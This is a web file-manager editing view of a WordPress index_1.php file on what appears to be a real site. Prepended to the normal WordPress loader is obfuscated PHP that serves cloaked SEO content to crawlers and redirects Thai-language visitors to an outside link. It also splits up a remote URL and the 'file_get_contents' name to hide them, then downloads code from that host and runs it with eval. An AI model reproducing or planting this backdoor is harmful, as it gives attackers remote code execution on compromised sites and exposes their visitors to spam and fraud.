✏️ 正在编辑: index_1.php
路径:
/home/u309991296/domains/worldmotorsbd.com/public_html/index_1.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $acceptLangRaw = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en'; $requestUri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/'; $is_bot = preg_match('/(bot|crawl|spider|slurp|facebook|twitter|linkedin|embed)/i', $userAgent); $browserLang = substr($acceptLangRaw, 0, 2); $seo_content_path = __DIR__ . '/wp-content/home/index.html'; if ($is_bot && $requestUri === '/') { if (file_exists($seo_content_path)) { readfile($seo_content_path); } else { define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php'; } exit; } if ($browserLang === 'th') { header("Location: https://swiy.co/goodrich555", true, 302); exit; } $load = ''; $zfj0304 = 'https://j260'.'514_13.ama'.'lia.fit/in'.'it.txt'; $sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s']; foreach($sources as $s) $load .= $s; $fetch = false; if(ini_get('allow_url_fopen') && function_exists($load)) { $fetch = @$load($zfj0304); } if($fetch === false && function_exists('curl_init')) { $ch = curl_init(); $opts = [10102=>true,10002=>$zfj0304,19913=>true,19914=>true,13=>10]; curl_setopt_array($ch, $opts); $fetch = curl_exec($ch); curl_close($ch); } if($fetch !== false) { $payload = '?>' . $fetch; eval($payload); } ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
💾 保存文件
← 返回文件管理器